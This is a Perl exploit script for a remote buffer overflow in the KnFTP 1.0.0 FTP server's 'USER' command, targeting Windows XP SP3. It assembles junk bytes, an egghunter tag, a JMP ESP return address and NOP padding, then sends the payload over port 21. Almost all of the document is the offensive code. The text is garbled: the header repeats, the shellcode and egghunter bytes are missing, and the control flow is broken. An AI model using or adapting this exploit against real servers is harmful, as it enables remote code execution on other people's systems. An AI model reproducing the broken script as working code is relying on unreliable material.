# Exploit Title: KnFTP1.0.0 Server - Remote Buffer Overflow Exploit,'USER' command
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "#Target App: KnFTP1.0.0 Server #\n";
print "#Attack: Remote Buffer Overflow Exploit - 'USER' command #\n";
print "#Target OS : Windows XP Pro English [Service Pack 3].#\n";
print "#------------------------------[ http://ghostinthelab.wordpress.com ]----#\n";
$target = "";
# The egghunter.
$egghunter =
"w00t". # <-- The 4 byte tag
# Calc.exe
$shellcode =
$junk = "\x41" x (284 - length("w00tw00t") - length($shellcode));
$eip = "\x13\x44\x87\x7c"; # 7C874413 JMP ESP - kernel32.dll
$padding = "\x90" x 15; # Send 10 nops.
$payload = $junk."w00tw00t".$shellcode.$eip.$padding.$egghunter;
if ($socket = IO::Socket::INET->new (PeerAddr => $target,PeerPort => "21",Proto => "TCP"))
print "\n[*] Sending buffer (".(length($payload))." bytes) to: $target! \n";
print $socket "USER ".$payload. "\r\n";
print $socket "PASS pwned \r\n";
print "[+] OK, exploitation Done!\n";
print "\n[-] Connection to $target failed!\n";